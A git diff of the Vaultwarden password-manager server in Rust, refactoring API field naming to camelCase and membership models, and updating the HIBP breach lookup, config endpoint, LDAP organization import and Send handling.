-        global.Excluded = excluded_globals.contains(&global.Type);
+        global.excluded = excluded_globals.contains(&global.r#type);
     }

     if no_excluded {
-        globals.retain(|g| !g.Excluded);
+        globals.retain(|g| !g.excluded);
     }

     Json(json!({
-        "EquivalentDomains": equivalent_domains,
-        "GlobalEquivalentDomains": globals,
-        "Object": "domains",
+        "equivalentDomains": equivalent_domains,
+        "globalEquivalentDomains": globals,
+        "object": "domains",
     }))
 }

-#[derive(Deserialize, Debug)]
-#[allow(non_snake_case)]
+#[derive(Debug, Deserialize)]
+#[serde(rename_all = "camelCase")]
 struct EquivDomainData {
-    ExcludedGlobalEquivalentDomains: Option<Vec<i32>>,
-    EquivalentDomains: Option<Vec<Vec<String>>>,
+    excluded_global_equivalent_domains: Option<Vec<i32>>,
+    equivalent_domains: Option<Vec<Vec<String>>>,
 }

 #[post("/settings/domains", data = "<data>")]
 async fn post_eq_domains(
-    data: JsonUpcase<EquivDomainData>,
+    data: Json<EquivDomainData>,
     headers: Headers,
     mut conn: DbConn,
     nt: Notify<'_>,
 ) -> JsonResult {
-    let data: EquivDomainData = data.into_inner().data;
+    let data: EquivDomainData = data.into_inner();

-    let excluded_globals = data.ExcludedGlobalEquivalentDomains.unwrap_or_default();
-    let equivalent_domains = data.EquivalentDomains.unwrap_or_default();
+    let excluded_globals = data.excluded_global_equivalent_domains.unwrap_or_default();
+    let equivalent_domains = data.equivalent_domains.unwrap_or_default();

     let mut user = headers.user;
     use serde_json::to_string;
@@ -122,31 +124,25 @@ async fn post_eq_domains(

     user.save(&mut conn).await?;

-    nt.send_user_update(UpdateType::SyncSettings, &user).await;
+    nt.send_user_update(UpdateType::SyncSettings, &user, &headers.device.push_uuid, &mut conn).await;

     Ok(Json(json!({})))
 }

 #[put("/settings/domains", data = "<data>")]
-async fn put_eq_domains(
-    data: JsonUpcase<EquivDomainData>,
-    headers: Headers,
-    conn: DbConn,
-    nt: Notify<'_>,
-) -> JsonResult {
+async fn put_eq_domains(data: Json<EquivDomainData>, headers: Headers, conn: DbConn, nt: Notify<'_>) -> JsonResult {
     post_eq_domains(data, headers, conn, nt).await
 }

 #[get("/hibp/breach?<username>")]
-async fn hibp_breach(username: &str) -> JsonResult {
-    let url = format!(
-        "https://haveibeenpwned.com/api/v3/breachedaccount/{username}?truncateResponse=false&includeUnverified=false"
-    );
+async fn hibp_breach(username: &str, _headers: Headers) -> JsonResult {
+    let username: String = url::form_urlencoded::byte_serialize(username.as_bytes()).collect();

     if let Some(api_key) = crate::CONFIG.hibp_api_key() {
-        let hibp_client = get_reqwest_client();
+        let url = format!(
+            "https://haveibeenpwned.com/api/v3/breachedaccount/{username}?truncateResponse=false&includeUnverified=false"
+        );

-        let res = hibp_client.get(&url).header("hibp-api-key", api_key).send().await?;
+        let res = make_http_request(Method::GET, &url)?.header("hibp-api-key", api_key).send().await?;

         // If we get a 404, return a 404, it means no breached accounts
         if res.status() == 404 {
@@ -157,15 +153,15 @@ async fn hibp_breach(username: &str) -> JsonResult {
|
|||||||
Ok(Json(value))
|
Ok(Json(value))
|
||||||
} else {
|
} else {
|
||||||
Ok(Json(json!([{
|
Ok(Json(json!([{
|
||||||
"Name": "HaveIBeenPwned",
|
"name": "HaveIBeenPwned",
|
||||||
"Title": "Manual HIBP Check",
|
"title": "Manual HIBP Check",
|
||||||
"Domain": "haveibeenpwned.com",
|
"domain": "haveibeenpwned.com",
|
||||||
"BreachDate": "2019-08-18T00:00:00Z",
|
"breachDate": "2019-08-18T00:00:00Z",
|
||||||
"AddedDate": "2019-08-18T00:00:00Z",
|
"addedDate": "2019-08-18T00:00:00Z",
|
||||||
"Description": format!("Go to: <a href=\"https://haveibeenpwned.com/account/{username}\" target=\"_blank\" rel=\"noreferrer\">https://haveibeenpwned.com/account/{username}</a> for a manual check.<br/><br/>HaveIBeenPwned API key not set!<br/>Go to <a href=\"https://haveibeenpwned.com/API/Key\" target=\"_blank\" rel=\"noreferrer\">https://haveibeenpwned.com/API/Key</a> to purchase an API key from HaveIBeenPwned.<br/><br/>"),
|
"description": format!("Go to: <a href=\"https://haveibeenpwned.com/account/{username}\" target=\"_blank\" rel=\"noreferrer\">https://haveibeenpwned.com/account/{username}</a> for a manual check.<br/><br/>HaveIBeenPwned API key not set!<br/>Go to <a href=\"https://haveibeenpwned.com/API/Key\" target=\"_blank\" rel=\"noreferrer\">https://haveibeenpwned.com/API/Key</a> to purchase an API key from HaveIBeenPwned.<br/><br/>"),
|
||||||
"LogoPath": "vw_static/hibp.png",
|
"logoPath": "vw_static/hibp.png",
|
||||||
"PwnCount": 0,
|
"pwnCount": 0,
|
||||||
"DataClasses": [
|
"dataClasses": [
|
||||||
"Error - No API key set!"
|
"Error - No API key set!"
|
||||||
]
|
]
|
||||||
}])))
|
}])))
|
||||||
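
Aside: the reworked hibp_breach percent-encodes the username before splicing it into the HIBP URL. A small sketch of that encoding step, assuming the url crate (example values only):

    fn main() {
        let username = "user+test@example.com";
        let encoded: String = url::form_urlencoded::byte_serialize(username.as_bytes()).collect();
        // '+' and '@' are escaped, so the path segment cannot be misparsed.
        let url = format!(
            "https://haveibeenpwned.com/api/v3/breachedaccount/{encoded}?truncateResponse=false&includeUnverified=false"
        );
        println!("{url}");
    }
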
@@ -188,22 +184,48 @@ fn version() -> Json<&'static str> {
     Json(crate::VERSION.unwrap_or_default())
 }

+#[get("/webauthn")]
+fn get_api_webauthn(_headers: Headers) -> Json<Value> {
+    // Prevent a 404 error, which also causes key-rotation issues
+    // It looks like this is used when login with passkeys is enabled, which Vaultwarden does not (yet) support
+    // An empty list/data also works fine
+    Json(json!({
+        "object": "list",
+        "data": [],
+        "continuationToken": null
+    }))
+}

 #[get("/config")]
 fn config() -> Json<Value> {
     let domain = crate::CONFIG.domain();
-    let feature_states = parse_experimental_client_feature_flags(&crate::CONFIG.experimental_client_feature_flags());
+    // Official available feature flags can be found here:
+    // Server (v2025.6.2): https://github.com/bitwarden/server/blob/d094be3267f2030bd0dc62106bc6871cf82682f5/src/Core/Constants.cs#L103
+    // Client (web-v2025.6.1): https://github.com/bitwarden/clients/blob/747c2fd6a1c348a57a76e4a7de8128466ffd3c01/libs/common/src/enums/feature-flag.enum.ts#L12
+    // Android (v2025.6.0): https://github.com/bitwarden/android/blob/b5b022caaad33390c31b3021b2c1205925b0e1a2/app/src/main/kotlin/com/x8bit/bitwarden/data/platform/manager/model/FlagKey.kt#L22
+    // iOS (v2025.6.0): https://github.com/bitwarden/ios/blob/ff06d9c6cc8da89f78f37f376495800201d7261a/BitwardenShared/Core/Platform/Models/Enum/FeatureFlag.swift#L7
+    let mut feature_states =
+        parse_experimental_client_feature_flags(&crate::CONFIG.experimental_client_feature_flags());
+    feature_states.insert("duo-redirect".to_string(), true);
+    feature_states.insert("email-verification".to_string(), true);
+    feature_states.insert("unauth-ui-refresh".to_string(), true);
+    feature_states.insert("enable-pm-flight-recorder".to_string(), true);
+    feature_states.insert("mobile-error-reporting".to_string(), true);

     Json(json!({
         // Note: The clients use this version to handle backwards compatibility concerns
         // This means they expect a version that closely matches the Bitwarden server version
         // We should make sure that we keep this updated when we support the new server features
         // Version history:
-        // - Individual cipher key encryption: 2023.9.1
-        "version": "2023.9.1",
+        // - Individual cipher key encryption: 2024.2.0
+        "version": "2025.6.0",
         "gitHash": option_env!("GIT_REV"),
         "server": {
             "name": "Vaultwarden",
-            "url": "https://github.com/dani-garcia/vaultwarden",
-            "version": crate::VERSION
+            "url": "https://github.com/dani-garcia/vaultwarden"
+        },
+        "settings": {
+            "disableUserRegistration": !crate::CONFIG.signups_allowed() && crate::CONFIG.signups_domains_whitelist().is_empty(),
         },
         "environment": {
             "vault": domain,
@@ -211,6 +233,12 @@ fn config() -> Json<Value> {
             "identity": format!("{domain}/identity"),
             "notifications": format!("{domain}/notifications"),
             "sso": "",
+            "cloudRegion": null,
+        },
+        // Bitwarden uses this for the self-hosted servers to indicate the default push technology
+        "push": {
+            "pushTechnology": 0,
+            "vapidPublicKey": null
         },
         "featureStates": feature_states,
         "object": "config",
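
Aside: the /config handler now starts from the configured experimental flags and layers server-enforced defaults on top. A simplified sketch of that two-step map construction; parse_flags and the flag names in the call are illustrative stand-ins, not the real parse_experimental_client_feature_flags:

    use std::collections::HashMap;

    fn parse_flags(raw: &str) -> HashMap<String, bool> {
        raw.split(',').map(str::trim).filter(|f| !f.is_empty()).map(|f| (f.to_string(), true)).collect()
    }

    fn main() {
        let mut feature_states = parse_flags("ssh-agent, example-flag");
        // Flags the server always supports are force-enabled after parsing.
        feature_states.insert("duo-redirect".to_string(), true);
        feature_states.insert("email-verification".to_string(), true);
        assert_eq!(feature_states.get("ssh-agent"), Some(&true));
    }
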
(File diff suppressed because it is too large)
@@ -1,13 +1,14 @@
 use chrono::Utc;
 use rocket::{
-    request::{self, FromRequest, Outcome},
+    request::{FromRequest, Outcome},
+    serde::json::Json,
     Request, Route,
 };

 use std::collections::HashSet;

 use crate::{
-    api::{EmptyResult, JsonUpcase},
+    api::EmptyResult,
     auth,
     db::{models::*, DbConn},
     mail, CONFIG,
@@ -18,103 +19,99 @@ pub fn routes() -> Vec<Route> {
 }

 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct OrgImportGroupData {
-    Name: String,
-    ExternalId: String,
-    MemberExternalIds: Vec<String>,
+    name: String,
+    external_id: String,
+    member_external_ids: Vec<String>,
 }

 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct OrgImportUserData {
-    Email: String,
-    ExternalId: String,
-    Deleted: bool,
+    email: String,
+    external_id: String,
+    deleted: bool,
 }

 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct OrgImportData {
-    Groups: Vec<OrgImportGroupData>,
-    Members: Vec<OrgImportUserData>,
-    OverwriteExisting: bool,
-    // LargeImport: bool, // For now this will not be used, upstream uses this to prevent syncs of more then 2000 users or groups without the flag set.
+    groups: Vec<OrgImportGroupData>,
+    members: Vec<OrgImportUserData>,
+    overwrite_existing: bool,
+    // largeImport: bool, // For now this will not be used, upstream uses this to prevent syncs of more then 2000 users or groups without the flag set.
 }

 #[post("/public/organization/import", data = "<data>")]
-async fn ldap_import(data: JsonUpcase<OrgImportData>, token: PublicToken, mut conn: DbConn) -> EmptyResult {
+async fn ldap_import(data: Json<OrgImportData>, token: PublicToken, mut conn: DbConn) -> EmptyResult {
     // Most of the logic for this function can be found here
-    // https://github.com/bitwarden/server/blob/fd892b2ff4547648a276734fb2b14a8abae2c6f5/src/Core/Services/Implementations/OrganizationService.cs#L1797
+    // https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Services/Implementations/OrganizationService.cs#L1203

     let org_id = token.0;
-    let data = data.into_inner().data;
+    let data = data.into_inner();

-    for user_data in &data.Members {
-        if user_data.Deleted {
+    for user_data in &data.members {
+        let mut user_created: bool = false;
+        if user_data.deleted {
             // If user is marked for deletion and it exists, revoke it
-            if let Some(mut user_org) =
-                UserOrganization::find_by_email_and_org(&user_data.Email, &org_id, &mut conn).await
-            {
+            if let Some(mut member) = Membership::find_by_email_and_org(&user_data.email, &org_id, &mut conn).await {
                 // Only revoke a user if it is not the last confirmed owner
-                let revoked = if user_org.atype == UserOrgType::Owner
-                    && user_org.status == UserOrgStatus::Confirmed as i32
+                let revoked = if member.atype == MembershipType::Owner
+                    && member.status == MembershipStatus::Confirmed as i32
                 {
-                    if UserOrganization::count_confirmed_by_org_and_type(&org_id, UserOrgType::Owner, &mut conn).await
-                        <= 1
-                    {
+                    if Membership::count_confirmed_by_org_and_type(&org_id, MembershipType::Owner, &mut conn).await <= 1
+                    {
                         warn!("Can't revoke the last owner");
                         false
                     } else {
-                        user_org.revoke()
+                        member.revoke()
                     }
                 } else {
-                    user_org.revoke()
+                    member.revoke()
                 };

-                let ext_modified = user_org.set_external_id(Some(user_data.ExternalId.clone()));
+                let ext_modified = member.set_external_id(Some(user_data.external_id.clone()));
                 if revoked || ext_modified {
-                    user_org.save(&mut conn).await?;
+                    member.save(&mut conn).await?;
                 }
             }
         // If user is part of the organization, restore it
-        } else if let Some(mut user_org) =
-            UserOrganization::find_by_email_and_org(&user_data.Email, &org_id, &mut conn).await
-        {
-            let restored = user_org.restore();
-            let ext_modified = user_org.set_external_id(Some(user_data.ExternalId.clone()));
+        } else if let Some(mut member) = Membership::find_by_email_and_org(&user_data.email, &org_id, &mut conn).await {
+            let restored = member.restore();
+            let ext_modified = member.set_external_id(Some(user_data.external_id.clone()));
             if restored || ext_modified {
-                user_org.save(&mut conn).await?;
+                member.save(&mut conn).await?;
             }
         } else {
             // If user is not part of the organization
-            let user = match User::find_by_mail(&user_data.Email, &mut conn).await {
+            let user = match User::find_by_mail(&user_data.email, &mut conn).await {
                 Some(user) => user, // exists in vaultwarden
                 None => {
                     // User does not exist yet
-                    let mut new_user = User::new(user_data.Email.clone());
+                    let mut new_user = User::new(user_data.email.clone());
                     new_user.save(&mut conn).await?;

                     if !CONFIG.mail_enabled() {
-                        let invitation = Invitation::new(&new_user.email);
-                        invitation.save(&mut conn).await?;
+                        Invitation::new(&new_user.email).save(&mut conn).await?;
                     }
+                    user_created = true;
                     new_user
                 }
             };
-            let user_org_status = if CONFIG.mail_enabled() || user.password_hash.is_empty() {
-                UserOrgStatus::Invited as i32
+            let member_status = if CONFIG.mail_enabled() || user.password_hash.is_empty() {
+                MembershipStatus::Invited as i32
             } else {
-                UserOrgStatus::Accepted as i32 // Automatically mark user as accepted if no email invites
+                MembershipStatus::Accepted as i32 // Automatically mark user as accepted if no email invites
             };

-            let mut new_org_user = UserOrganization::new(user.uuid.clone(), org_id.clone());
-            new_org_user.set_external_id(Some(user_data.ExternalId.clone()));
-            new_org_user.access_all = false;
-            new_org_user.atype = UserOrgType::User as i32;
-            new_org_user.status = user_org_status;
+            let mut new_member = Membership::new(user.uuid.clone(), org_id.clone());
+            new_member.set_external_id(Some(user_data.external_id.clone()));
+            new_member.access_all = false;
+            new_member.atype = MembershipType::User as i32;
+            new_member.status = member_status;

-            new_org_user.save(&mut conn).await?;
+            new_member.save(&mut conn).await?;

             if CONFIG.mail_enabled() {
                 let (org_name, org_email) = match Organization::find_by_uuid(&org_id, &mut conn).await {
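
Aside: both the revoke path and the later delete path in ldap_import guard against removing the last confirmed owner. The guard reduced to plain data (the count stands in for Membership::count_confirmed_by_org_and_type):

    fn can_remove_owner(confirmed_owners: i64) -> bool {
        // More than one confirmed owner must remain before one may be revoked or deleted.
        confirmed_owners > 1
    }

    fn main() {
        assert!(!can_remove_owner(1)); // sole owner is kept, with a warning
        assert!(can_remove_owner(2));
    }
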
@@ -122,26 +119,34 @@ async fn ldap_import(data: JsonUpcase<OrgImportData>, token: PublicToken, mut co
                     None => err!("Error looking up organization"),
                 };

-                mail::send_invite(
-                    &user_data.Email,
-                    &user.uuid,
-                    Some(org_id.clone()),
-                    Some(new_org_user.uuid),
-                    &org_name,
-                    Some(org_email),
-                )
-                .await?;
+                if let Err(e) =
+                    mail::send_invite(&user, org_id.clone(), new_member.uuid.clone(), &org_name, Some(org_email)).await
+                {
+                    // Upon error delete the user, invite and org member records when needed
+                    if user_created {
+                        user.delete(&mut conn).await?;
+                    } else {
+                        new_member.delete(&mut conn).await?;
+                    }
+
+                    err!(format!("Error sending invite: {e:?} "));
+                }
             }
         }
     }

     if CONFIG.org_groups_enabled() {
-        for group_data in &data.Groups {
-            let group_uuid = match Group::find_by_external_id(&group_data.ExternalId, &mut conn).await {
+        for group_data in &data.groups {
+            let group_uuid = match Group::find_by_external_id_and_org(&group_data.external_id, &org_id, &mut conn).await
+            {
                 Some(group) => group.uuid,
                 None => {
-                    let mut group =
-                        Group::new(org_id.clone(), group_data.Name.clone(), false, Some(group_data.ExternalId.clone()));
+                    let mut group = Group::new(
+                        org_id.clone(),
+                        group_data.name.clone(),
+                        false,
+                        Some(group_data.external_id.clone()),
+                    );
                     group.save(&mut conn).await?;
                     group.uuid
                 }
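
Aside: the new invite path rolls back on mail failure. If the user record was created during this same sync, the whole user is deleted; otherwise only the fresh membership row goes. A sketch with stand-in types (MailError and the println calls are illustrative, not the real models):

    #[derive(Debug)]
    struct MailError(String);

    fn send_invite(_email: &str) -> Result<(), MailError> {
        Err(MailError("SMTP unreachable".into())) // always fails, to exercise the rollback
    }

    fn invite(email: &str, user_created: bool) -> Result<(), String> {
        if let Err(e) = send_invite(email) {
            if user_created {
                println!("rollback: delete freshly created user {email}");
            } else {
                println!("rollback: delete only the new membership for {email}");
            }
            return Err(format!("Error sending invite: {e:?}"));
        }
        Ok(())
    }

    fn main() {
        let _ = invite("new@example.com", true);
    }
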
@@ -149,10 +154,9 @@ async fn ldap_import(data: JsonUpcase<OrgImportData>, token: PublicToken, mut co

             GroupUser::delete_all_by_group(&group_uuid, &mut conn).await?;

-            for ext_id in &group_data.MemberExternalIds {
-                if let Some(user_org) = UserOrganization::find_by_external_id_and_org(ext_id, &org_id, &mut conn).await
-                {
-                    let mut group_user = GroupUser::new(group_uuid.clone(), user_org.uuid.clone());
+            for ext_id in &group_data.member_external_ids {
+                if let Some(member) = Membership::find_by_external_id_and_org(ext_id, &org_id, &mut conn).await {
+                    let mut group_user = GroupUser::new(group_uuid.clone(), member.uuid.clone());
                     group_user.save(&mut conn).await?;
                 }
             }
@@ -162,23 +166,22 @@ async fn ldap_import(data: JsonUpcase<OrgImportData>, token: PublicToken, mut co
     }

     // If this flag is enabled, any user that isn't provided in the Users list will be removed (by default they will be kept unless they have Deleted == true)
-    if data.OverwriteExisting {
+    if data.overwrite_existing {
         // Generate a HashSet to quickly verify if a member is listed or not.
-        let sync_members: HashSet<String> = data.Members.into_iter().map(|m| m.ExternalId).collect();
-        for user_org in UserOrganization::find_by_org(&org_id, &mut conn).await {
-            if let Some(ref user_external_id) = user_org.external_id {
+        let sync_members: HashSet<String> = data.members.into_iter().map(|m| m.external_id).collect();
+        for member in Membership::find_by_org(&org_id, &mut conn).await {
+            if let Some(ref user_external_id) = member.external_id {
                 if !sync_members.contains(user_external_id) {
-                    if user_org.atype == UserOrgType::Owner && user_org.status == UserOrgStatus::Confirmed as i32 {
+                    if member.atype == MembershipType::Owner && member.status == MembershipStatus::Confirmed as i32 {
                         // Removing owner, check that there is at least one other confirmed owner
-                        if UserOrganization::count_confirmed_by_org_and_type(&org_id, UserOrgType::Owner, &mut conn)
-                            .await
+                        if Membership::count_confirmed_by_org_and_type(&org_id, MembershipType::Owner, &mut conn).await
                             <= 1
                         {
                             warn!("Can't delete the last owner");
                             continue;
                         }
                     }
-                    user_org.delete(&mut conn).await?;
+                    member.delete(&mut conn).await?;
                 }
             }
         }
@@ -187,13 +190,13 @@ async fn ldap_import(data: JsonUpcase<OrgImportData>, token: PublicToken, mut co
     Ok(())
 }

-pub struct PublicToken(String);
+pub struct PublicToken(OrganizationId);

 #[rocket::async_trait]
 impl<'r> FromRequest<'r> for PublicToken {
     type Error = &'static str;

-    async fn from_request(request: &'r Request<'_>) -> request::Outcome<Self, Self::Error> {
+    async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
         let headers = request.headers();
         // Get access_token
         let access_token: &str = match headers.get_one("Authorization") {
@@ -204,24 +207,19 @@ impl<'r> FromRequest<'r> for PublicToken {
             None => err_handler!("No access token provided"),
         };
         // Check JWT token is valid and get device and user from it
-        let claims = match auth::decode_api_org(access_token) {
-            Ok(claims) => claims,
-            Err(_) => err_handler!("Invalid claim"),
+        let Ok(claims) = auth::decode_api_org(access_token) else {
+            err_handler!("Invalid claim")
         };
         // Check if time is between claims.nbf and claims.exp
-        let time_now = Utc::now().naive_utc().timestamp();
+        let time_now = Utc::now().timestamp();
         if time_now < claims.nbf {
            err_handler!("Token issued in the future");
         }
         if time_now > claims.exp {
             err_handler!("Token expired");
         }
-        // Check if claims.iss is host|claims.scope[0]
-        let host = match auth::Host::from_request(request).await {
-            Outcome::Success(host) => host,
-            _ => err_handler!("Error getting Host"),
-        };
-        let complete_host = format!("{}|{}", host.host, claims.scope[0]);
+        // Check if claims.iss is domain|claims.scope[0]
+        let complete_host = format!("{}|{}", CONFIG.domain_origin(), claims.scope[0]);
         if complete_host != claims.iss {
             err_handler!("Token not issued by this server");
         }
@@ -232,13 +230,12 @@ impl<'r> FromRequest<'r> for PublicToken {
             Outcome::Success(conn) => conn,
             _ => err_handler!("Error getting DB"),
         };
-        let org_uuid = match claims.client_id.strip_prefix("organization.") {
-            Some(uuid) => uuid,
-            None => err_handler!("Malformed client_id"),
+        let Some(org_id) = claims.client_id.strip_prefix("organization.") else {
+            err_handler!("Malformed client_id")
         };
-        let org_api_key = match OrganizationApiKey::find_by_org_uuid(org_uuid, &conn).await {
-            Some(org_api_key) => org_api_key,
-            None => err_handler!("Invalid client_id"),
+        let org_id: OrganizationId = org_id.to_string().into();
+        let Some(org_api_key) = OrganizationApiKey::find_by_org_uuid(&org_id, &conn).await else {
+            err_handler!("Invalid client_id")
         };
         if org_api_key.org_uuid != claims.client_sub {
             err_handler!("Token not issued for this org");
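
Aside: the PublicToken extractor now leans on let-else, so each validation step reads top to bottom with an early bail-out. The client_id check as a standalone sketch (Result stands in for the err_handler! macro):

    fn parse_org_client_id(client_id: &str) -> Result<String, &'static str> {
        let Some(org_id) = client_id.strip_prefix("organization.") else {
            return Err("Malformed client_id");
        };
        Ok(org_id.to_string())
    }

    fn main() {
        assert_eq!(parse_org_client_id("organization.42").as_deref(), Ok("42"));
        assert!(parse_org_client_id("user.42").is_err());
    }
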
@@ -1,7 +1,9 @@
 use std::path::Path;
+use std::time::Duration;

-use chrono::{DateTime, Duration, Utc};
+use chrono::{DateTime, TimeDelta, Utc};
 use num_traits::ToPrimitive;
+use once_cell::sync::Lazy;
 use rocket::form::Form;
 use rocket::fs::NamedFile;
 use rocket::fs::TempFile;
@@ -9,14 +11,30 @@ use rocket::serde::json::Json;
 use serde_json::Value;

 use crate::{
-    api::{ApiResult, EmptyResult, JsonResult, JsonUpcase, Notify, UpdateType},
+    api::{ApiResult, EmptyResult, JsonResult, Notify, UpdateType},
     auth::{ClientIp, Headers, Host},
+    config::PathType,
     db::{models::*, DbConn, DbPool},
-    util::{NumberOrString, SafeString},
+    util::{save_temp_file, NumberOrString},
     CONFIG,
 };

 const SEND_INACCESSIBLE_MSG: &str = "Send does not exist or is no longer available";
+
+static ANON_PUSH_DEVICE: Lazy<Device> = Lazy::new(|| {
+    let dt = crate::util::parse_date("1970-01-01T00:00:00.000000Z");
+    Device {
+        uuid: String::from("00000000-0000-0000-0000-000000000000").into(),
+        created_at: dt,
+        updated_at: dt,
+        user_uuid: String::from("00000000-0000-0000-0000-000000000000").into(),
+        name: String::new(),
+        atype: 14, // 14 == Unknown Browser
+        push_uuid: Some(String::from("00000000-0000-0000-0000-000000000000").into()),
+        push_token: None,
+        refresh_token: String::new(),
+        twofactor_remember: None,
+    }
+});

 // The max file size allowed by Bitwarden clients and add an extra 5% to avoid issues
 const SIZE_525_MB: i64 = 550_502_400;
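
Aside: ANON_PUSH_DEVICE uses once_cell's Lazy, so the placeholder device is built exactly once, on first access, and shared by every anonymous Send access. The pattern in isolation (FakeDevice is a stand-in for the real Device model):

    use once_cell::sync::Lazy;

    struct FakeDevice {
        uuid: String,
        atype: i32,
    }

    static ANON_DEVICE: Lazy<FakeDevice> = Lazy::new(|| FakeDevice {
        uuid: "00000000-0000-0000-0000-000000000000".into(),
        atype: 14, // 14 == Unknown Browser in Bitwarden's device-type enum
    });

    fn main() {
        // The first deref runs the closure; later derefs reuse the cached value.
        println!("{} / {}", ANON_DEVICE.uuid, ANON_DEVICE.atype);
    }
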
@@ -48,23 +66,26 @@ pub async fn purge_sends(pool: DbPool) {
 }

 #[derive(Deserialize)]
-#[allow(non_snake_case)]
-struct SendData {
-    Type: i32,
-    Key: String,
-    Password: Option<String>,
-    MaxAccessCount: Option<NumberOrString>,
-    ExpirationDate: Option<DateTime<Utc>>,
-    DeletionDate: DateTime<Utc>,
-    Disabled: bool,
-    HideEmail: Option<bool>,
+#[serde(rename_all = "camelCase")]
+pub struct SendData {
+    r#type: i32,
+    key: String,
+    password: Option<String>,
+    max_access_count: Option<NumberOrString>,
+    expiration_date: Option<DateTime<Utc>>,
+    deletion_date: DateTime<Utc>,
+    disabled: bool,
+    hide_email: Option<bool>,

     // Data field
-    Name: String,
-    Notes: Option<String>,
-    Text: Option<Value>,
-    File: Option<Value>,
-    FileLength: Option<NumberOrString>,
+    name: String,
+    notes: Option<String>,
+    text: Option<Value>,
+    file: Option<Value>,
+    file_length: Option<NumberOrString>,

+    // Used for key rotations
+    pub id: Option<SendId>,
 }

 /// Enforces the `Disable Send` policy. A non-owner/admin user belonging to
@@ -76,9 +97,9 @@ struct SendData {
 /// There is also a Vaultwarden-specific `sends_allowed` config setting that
 /// controls this policy globally.
 async fn enforce_disable_send_policy(headers: &Headers, conn: &mut DbConn) -> EmptyResult {
-    let user_uuid = &headers.user.uuid;
+    let user_id = &headers.user.uuid;
     if !CONFIG.sends_allowed()
-        || OrgPolicy::is_applicable_to_user(user_uuid, OrgPolicyType::DisableSend, None, conn).await
+        || OrgPolicy::is_applicable_to_user(user_id, OrgPolicyType::DisableSend, None, conn).await
     {
         err!("Due to an Enterprise Policy, you are only able to delete an existing Send.")
     }
@@ -92,9 +113,9 @@ async fn enforce_disable_send_policy(headers: &Headers, conn: &mut DbConn) -> Em
 ///
 /// Ref: https://bitwarden.com/help/article/policies/#send-options
 async fn enforce_disable_hide_email_policy(data: &SendData, headers: &Headers, conn: &mut DbConn) -> EmptyResult {
-    let user_uuid = &headers.user.uuid;
-    let hide_email = data.HideEmail.unwrap_or(false);
-    if hide_email && OrgPolicy::is_hide_email_disabled(user_uuid, conn).await {
+    let user_id = &headers.user.uuid;
+    let hide_email = data.hide_email.unwrap_or(false);
+    if hide_email && OrgPolicy::is_hide_email_disabled(user_id, conn).await {
         err!(
             "Due to an Enterprise Policy, you are not allowed to hide your email address \
             from recipients when creating or editing a Send."
@@ -103,41 +124,41 @@ async fn enforce_disable_hide_email_policy(data: &SendData, headers: &Headers, c
     Ok(())
 }

-fn create_send(data: SendData, user_uuid: String) -> ApiResult<Send> {
-    let data_val = if data.Type == SendType::Text as i32 {
-        data.Text
-    } else if data.Type == SendType::File as i32 {
-        data.File
+fn create_send(data: SendData, user_id: UserId) -> ApiResult<Send> {
+    let data_val = if data.r#type == SendType::Text as i32 {
+        data.text
+    } else if data.r#type == SendType::File as i32 {
+        data.file
     } else {
         err!("Invalid Send type")
     };

     let data_str = if let Some(mut d) = data_val {
-        d.as_object_mut().and_then(|o| o.remove("Response"));
+        d.as_object_mut().and_then(|o| o.remove("response"));
         serde_json::to_string(&d)?
     } else {
         err!("Send data not provided");
     };

-    if data.DeletionDate > Utc::now() + Duration::days(31) {
+    if data.deletion_date > Utc::now() + TimeDelta::try_days(31).unwrap() {
         err!(
             "You cannot have a Send with a deletion date that far into the future. Adjust the Deletion Date to a value less than 31 days from now and try again."
         );
     }

-    let mut send = Send::new(data.Type, data.Name, data_str, data.Key, data.DeletionDate.naive_utc());
-    send.user_uuid = Some(user_uuid);
-    send.notes = data.Notes;
-    send.max_access_count = match data.MaxAccessCount {
+    let mut send = Send::new(data.r#type, data.name, data_str, data.key, data.deletion_date.naive_utc());
+    send.user_uuid = Some(user_id);
+    send.notes = data.notes;
+    send.max_access_count = match data.max_access_count {
         Some(m) => Some(m.into_i32()?),
         _ => None,
     };
-    send.expiration_date = data.ExpirationDate.map(|d| d.naive_utc());
-    send.disabled = data.Disabled;
-    send.hide_email = data.HideEmail;
-    send.atype = data.Type;
+    send.expiration_date = data.expiration_date.map(|d| d.naive_utc());
+    send.disabled = data.disabled;
+    send.hide_email = data.hide_email;
+    send.atype = data.r#type;

-    send.set_password(data.Password.as_deref());
+    send.set_password(data.password.as_deref());

     Ok(send)
 }
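
Aside: in recent chrono 0.4 releases Duration is an alias for TimeDelta, and the diff moves to the fallible TimeDelta::try_days constructor, unwrapped here because 31 is always in range. The deletion-date bound in isolation (example values):

    use chrono::{TimeDelta, Utc};

    fn main() {
        let limit = Utc::now() + TimeDelta::try_days(31).unwrap();
        let requested = Utc::now() + TimeDelta::try_days(45).unwrap();
        if requested > limit {
            println!("deletion date too far in the future: reject");
        }
    }
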
@@ -148,34 +169,28 @@ async fn get_sends(headers: Headers, mut conn: DbConn) -> Json<Value> {
     let sends_json: Vec<Value> = sends.await.iter().map(|s| s.to_json()).collect();

     Json(json!({
-        "Data": sends_json,
-        "Object": "list",
-        "ContinuationToken": null
+        "data": sends_json,
+        "object": "list",
+        "continuationToken": null
     }))
 }

-#[get("/sends/<uuid>")]
-async fn get_send(uuid: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
-    let send = match Send::find_by_uuid(uuid, &mut conn).await {
-        Some(send) => send,
-        None => err!("Send not found"),
-    };
-
-    if send.user_uuid.as_ref() != Some(&headers.user.uuid) {
-        err!("Send is not owned by user")
+#[get("/sends/<send_id>")]
+async fn get_send(send_id: SendId, headers: Headers, mut conn: DbConn) -> JsonResult {
+    match Send::find_by_uuid_and_user(&send_id, &headers.user.uuid, &mut conn).await {
+        Some(send) => Ok(Json(send.to_json())),
+        None => err!("Send not found", "Invalid send uuid or does not belong to user"),
     }
-
-    Ok(Json(send.to_json()))
 }

 #[post("/sends", data = "<data>")]
-async fn post_send(data: JsonUpcase<SendData>, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> JsonResult {
+async fn post_send(data: Json<SendData>, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> JsonResult {
     enforce_disable_send_policy(&headers, &mut conn).await?;

-    let data: SendData = data.into_inner().data;
